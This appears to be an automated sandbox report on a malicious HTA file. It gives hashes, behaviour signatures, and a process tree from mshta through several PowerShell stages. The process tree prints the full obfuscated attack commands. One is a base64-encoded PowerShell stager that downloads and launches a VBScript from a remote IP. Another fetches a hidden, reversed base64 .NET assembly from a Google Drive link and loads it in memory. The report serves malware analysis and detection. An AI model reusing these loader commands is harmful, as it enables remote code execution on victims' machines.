Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-10-2024 12:45
Static task
static1
Behavioral task
behavioral1
Sample
seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
-
Size
131KB
-
MD5
196fb761aa0f295e150b75bd8ad638b4
-
SHA1
c209ef825b7f80e43f3c904efbc2df582117eeb0
-
SHA256
86f7ef2ea14259c52d1fe1627978ef45a94fc4234c7328a1492da55a400703d6
-
SHA512
38b7eaff75c6d2cc3b5da4ebb6c345247d35d44b29804c67227404942075db9abf6466716122be3cc4bcb7c8188e0aa3c3b69d9459fd1cff8f5177eaae028b85
-
SSDEEP
96:4vCt7evwlevO+D4xMUrwKtkTt0cZPeIvdDveRAz5hg3vBQ:4vCFUWUiXwK2TpSbBQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
poWERSHELl.eXEpowershell.exeflow pid process 4 1488 poWERSHELl.eXE 6 2340 powershell.exe 8 2340 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1860 powershell.exe 2340 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
Processes:
poWERSHELl.eXEpowershell.exepid process 1488 poWERSHELl.eXE 2324 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WScript.exepowershell.exepowershell.exemshta.exepoWERSHELl.eXEpowershell.execsc.execvtres.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERSHELl.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
poWERSHELl.eXEpowershell.exepowershell.exepowershell.exepid process 1488 poWERSHELl.eXE 2324 powershell.exe 1488 poWERSHELl.eXE 1488 poWERSHELl.eXE 1860 powershell.exe 2340 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
poWERSHELl.eXEpowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1488 poWERSHELl.eXE Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 2340 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
mshta.exepoWERSHELl.eXEcsc.exeWScript.exepowershell.exedescription pid process target process PID 2380 wrote to memory of 1488 2380 mshta.exe poWERSHELl.eXE PID 2380 wrote to memory of 1488 2380 mshta.exe poWERSHELl.eXE PID 2380 wrote to memory of 1488 2380 mshta.exe poWERSHELl.eXE PID 2380 wrote to memory of 1488 2380 mshta.exe poWERSHELl.eXE PID 1488 wrote to memory of 2324 1488 poWERSHELl.eXE powershell.exe PID 1488 wrote to memory of 2324 1488 poWERSHELl.eXE powershell.exe PID 1488 wrote to memory of 2324 1488 poWERSHELl.eXE powershell.exe PID 1488 wrote to memory of 2324 1488 poWERSHELl.eXE powershell.exe PID 1488 wrote to memory of 2960 1488 poWERSHELl.eXE csc.exe PID 1488 wrote to memory of 2960 1488 poWERSHELl.eXE csc.exe PID 1488 wrote to memory of 2960 1488 poWERSHELl.eXE csc.exe PID 1488 wrote to memory of 2960 1488 poWERSHELl.eXE csc.exe PID 2960 wrote to memory of 2432 2960 csc.exe cvtres.exe PID 2960 wrote to memory of 2432 2960 csc.exe cvtres.exe PID 2960 wrote to memory of 2432 2960 csc.exe cvtres.exe PID 2960 wrote to memory of 2432 2960 csc.exe cvtres.exe PID 1488 wrote to memory of 1684 1488 poWERSHELl.eXE WScript.exe PID 1488 wrote to memory of 1684 1488 poWERSHELl.eXE WScript.exe PID 1488 wrote to memory of 1684 1488 poWERSHELl.eXE WScript.exe PID 1488 wrote to memory of 1684 1488 poWERSHELl.eXE WScript.exe PID 1684 wrote to memory of 1860 1684 WScript.exe powershell.exe PID 1684 wrote to memory of 1860 1684 WScript.exe powershell.exe PID 1684 wrote to memory of 1860 1684 WScript.exe powershell.exe PID 1684 wrote to memory of 1860 1684 WScript.exe powershell.exe PID 1860 wrote to memory of 2340 1860 powershell.exe powershell.exe PID 1860 wrote to memory of 2340 1860 powershell.exe powershell.exe PID 1860 wrote to memory of 2340 1860 powershell.exe powershell.exe PID 1860 wrote to memory of 2340 1860 powershell.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE"C:\Windows\systEm32\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE" "PoWeRSheLL -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe ; iex($(Iex('[SYsTeM.TeXt.ENCODinG]'+[chAR]58+[chAR]58+'UTF8.geTStRING([SysteM.CONVERT]'+[CHAR]0x3a+[cHAr]0X3A+'fRomBaSe64STring('+[ChAr]34+'JEREICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlckRlZkluaXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR0Vkh5Zm5wRUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVnZ3cXksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNvSVVxaVgsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdm0pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMZkJpeHBhTVFhSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVVUTURZQ2tkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRERDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMy9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzdG9oYXBwZW5lZC50SUYiLCIkRW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc3RvaGFwcC52YlMiLDAsMCk7c1RhUlQtc2xFZVAoMyk7U1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3N0b2hhcHAudmJTIg=='+[CHAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f-6xhtop.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES143D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC143C.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2432
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatnewswithgoodthingstohapp.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnR1ZDaW1hZ2VVcmwnKycgPSBTcHJodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd24nKydsbycrJ2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciBTcHI7R1ZDd2ViQ2xpJysnZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHVkNpbWFnZUJ5dGVzID0nKycgR1ZDd2ViQ2xpZW50LkRvd24nKydsb2FkJysnRGF0YScrJyhHVkNpbWFnZVVybCknKyc7R1ZDaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoR1ZDaW1hZycrJ2VCeXRlcyk7R1YnKydDc3RhcnRGbGFnID0gU3ByPDxCQVNFNjRfU1RBUlQ+PlNwcjtHVkNlbmRGbGFnID0gU3ByPCcrJzxCQVNFNjRfRU5EPj5TcHI7R1ZDc3RhcnRJbmRleCA9IEdWQ2ltYWdlVGV4dC5JbicrJ2RleE9mKEdWQ3N0YXJ0RmxhZyk7R1ZDZW5kSW5kZXggPSBHVkNpJysnbWFnZVRleHQuSW5kZXhPZihHVkNlbmRGbGFnKTtHVkNzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgR1ZDZScrJ25kSW5kZXggLWd0IEdWQ3MnKyd0YXJ0SW5kZXg7R1ZDc3RhcnRJbmRleCArPSBHVkNzdGFydEZsYWcuTGVuZ3RoO0dWQ2Jhc2U2NExlbmd0aCA9IEdWQ2VuZEluZGV4IC0gR1ZDc3RhcicrJ3RJbmRleDtHVkNiYXNlNjRDb21tYW5kID0gR1ZDaW1hZ2VUZXh0JysnLlN1YnN0cmluZycrJyhHVkNzdGFydEluZGV4LCBHVkNiYXNlNjRMZW5ndGgpO0dWQ2Jhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEdWQ2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBUMHggRm9yRWFjaC1PYmplY3QgeyBHJysnVkNfIH0pWy0xLi4tKEdWQ2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07R1ZDYycrJ29tbWFuZEJ5dGVzID0gW1N5cycrJ3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZyhHVkNiYXNlNjRSZXZlcnNlZCk7R1ZDbG9hZGVkQXNzZW1ibHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZScrJ21ibHldOjpMb2FkKEdWQ2NvbW1hbmRCeXRlcyk7R1ZDdmFpJysnTWV0aG9kID0gW2RuJysnbGliLklPLkhvbWVdLkdldE1ldGhvZChTcHJWQUlTcHIpO0dWQ3ZhaU1ldGhvZC5JbnZva2UoR1ZDbnVsbCwgQChTcHJ0eHQuU0dPTEtMLzMyNC81NTEuODcxLjY0Ljg5MS8vOnB0dGhTcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwckNhc1BvbFNwciwgUycrJ3ByZGVzYXRpdmFkb1NwciwgU3ByZGUnKydzYXRpJysndmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwJysncmRlc2F0aScrJ3ZhZG9TcHIsU3ByZGVzYXRpdmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwcmRlc2F0aXZhZG9TcHIsJysnU3ByMVNwcixTcHJkZXNhdGl2YWRvU3ByKSk7JykgLWNyRVBMQWNFIChbY2hhcl04NCtbY2hhcl00OCtbY2hhcl0xMjApLFtjaGFyXTEyNCAtUkVwbGFjZSAoW2NoYXJdNzErW2NoYXJdODYrW2NoYXJdNjcpLFtjaGFyXTM2ICAtY3JFUExBY0UgKFtjaGFyXTgzK1tjaGFyXTExMitbY2hhcl0xMTQpLFtjaGFyXTM5KSB8IElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('GVCimageUrl'+' = Sprhttps://drive.google.com/uc?export=down'+'lo'+'ad&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur Spr;GVCwebCli'+'en'+'t = New-Object System.Net.WebClient;GVCimageBytes ='+' GVCwebClient.Down'+'load'+'Data'+'(GVCimageUrl)'+';GVCimageText = [System.Text.Encoding]::UTF8.GetString(GVCimag'+'eBytes);GV'+'CstartFlag = Spr<<BASE64_START>>Spr;GVCendFlag = Spr<'+'<BASE64_END>>Spr;GVCstartIndex = GVCimageText.In'+'dexOf(GVCstartFlag);GVCendIndex = GVCi'+'mageText.IndexOf(GVCendFlag);GVCstartInde'+'x -ge 0 -and GVCe'+'ndIndex -gt GVCs'+'tartIndex;GVCstartIndex += GVCstartFlag.Length;GVCbase64Length = GVCendIndex - GVCstar'+'tIndex;GVCbase64Command = GVCimageText'+'.Substring'+'(GVCstartIndex, GVCbase64Length);GVCbase64Reversed = '+'-join (GVCbase64Command.ToCharArray() T0x ForEach-Object { G'+'VC_ })[-1..-(GVCbase64Command.Length)];GVCc'+'ommandBytes = [Sys'+'t'+'em.Convert]::FromBas'+'e64String(GVCbase64Reversed);GVCloadedAssembly = '+'[System.Reflection.Asse'+'mbly]::Load(GVCcommandBytes);GVCvai'+'Method = [dn'+'lib.IO.Home].GetMethod(SprVAISpr);GVCvaiMethod.Invoke(GVCnull, @(Sprtxt.SGOLKL/324/551.871.64.891//:ptthSpr, SprdesativadoSpr, SprdesativadoSpr, SprdesativadoSpr, SprCasPolSpr, S'+'prdesativadoSpr, Sprde'+'sati'+'vadoSpr,SprdesativadoSpr,Sp'+'rdesati'+'vadoSpr,SprdesativadoSpr,SprdesativadoSpr,SprdesativadoSpr,'+'Spr1Spr,SprdesativadoSpr));') -crEPLAcE ([char]84+[char]48+[char]120),[char]124 -REplace ([char]71+[char]86+[char]67),[char]36 -crEPLAcE ([char]83+[char]112+[char]114),[char]39) | Iex"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bd15e0a92e104c1615ca7c57096b1702
SHA11c7626995347cc8091155b559589b4634d80138d
SHA256161835a82df959e1f0739365e557b60ecbf4846cc1632fe1a37511478b569cb8
SHA51200d185d03e4113f15a9f6af529b298a0a67f46a8a3a185f25dbd0bb93f07a310c0d461f00c1da23ad6f35c65cc1f6d588ce438b6e3d12618534ce2453966cc2c
-
Filesize
3KB
MD5099687361931b4a409a5bef21d993cc2
SHA1af93c7b42d3016c712d5358b71f0d38b29e661ed
SHA2560c2125082727f892da0e5e174b0ef786389c8b6a03447576fc20b9f40a327de0
SHA512cc412d7dce37bca90a34e45469f75a90d7456fc85d8d5076685c3145e2ca41df82e3cf23c134c780ae754e1218404365ae1a5d7a386c50b8252781dc49ea9385
-
Filesize
7KB
MD535a7249c767a28362085227a7f7747b9
SHA15d20ab3451d4ff5d0a04c60a5441c8c6f188eaf7
SHA25638629fa79d7cb7ae5e86841e8c930f08d1ebd4a585412437299282c3b0d69b6f
SHA512c1be3c5ded807628d17ce7d7b9d089c261f6562230690c87515bb552d04056e8122f3e8ac6301266a255951ef54bbf17c62c80b61731e925c5638e6823b8615f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5794861db89ac74bcf0c4293dc3769319
SHA19a3e30a7818bea2008453e30d10f878ac2996c38
SHA256f556536c879f4a07424d8a70a2a18262d0e932062d4c4b524bead4f0acc12d51
SHA5128dc34a04fab5db4c05b296cb6632287377745622b946b1ce2e008024dfa3299152587601fc29984fedb1247b788fb8200e65d5c5393da1254836607ba145df63
-
Filesize
136KB
MD5e7dde34531d98d4b94175ad3269d5667
SHA1fa9596b284c756bcf9a14dc5ebc2b84607d398ae
SHA2561d85e569b13244ff1ef054cec322a314c9880567b511b6ee817068c0dcd5d38b
SHA512d39505a3951fd19c3809a0640218d39414bfb9efcc0d1c534ee5d9a4d17ddbcf7d3ad40d255a6e8a58d259e7ce61ac9f16e3d55b17d674eadb68997b551b4843
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD553520be813a9fb52170395a036727067
SHA18ab1f68dbb4880efc39a24722853bddff7c5b3de
SHA256d4f5480137ffc29c36e5bf4ceba2d4d9d6fe443046b4c3fdeafd793ebe9a564d
SHA5128a88ba119077f75e5cf6c80bf96a10071ea8e0bf8518a2f01c6ce6891a24bc993f8f4bcaa744270276107f31f2bfd6edf00e7c663b70e3b44b2b66e35e579149
-
Filesize
462B
MD5c3b2cac94b16f2aa7b62978b69741a03
SHA124b7bd8cf3a07a364bd91c2581a9a67cb25c8e3e
SHA256a1d1f69141b09c2027c3ecf1b0eeb0b0d2a1ee67ee96436591461acd6f1b9d20
SHA5123f4ab831992c6ffce0b348f105d13bea0ebdabe992d9d4283ba8671069529acb9e8fa8f3ec227aef6ce7f6180309dea4823b82f9cd78f94e5081f3d748fa0cb7
-
Filesize
309B
MD5584f700a6e4d7556e7428b9c06454e1a
SHA1fe9316f84a97583c54e64246bf9b9e1835810c51
SHA25646bb182321978445eb948c21d03eb0fe2c9124d9a3ca614678797bbc51ae4817
SHA512e0beaf950bade46dee14aa0035ea28680fcb3702ad4547dfd8e2b35970a3c69d71af8b638a07f49b040205246f92dfaa2c0150d1d9c79152520f4f92a0164f5d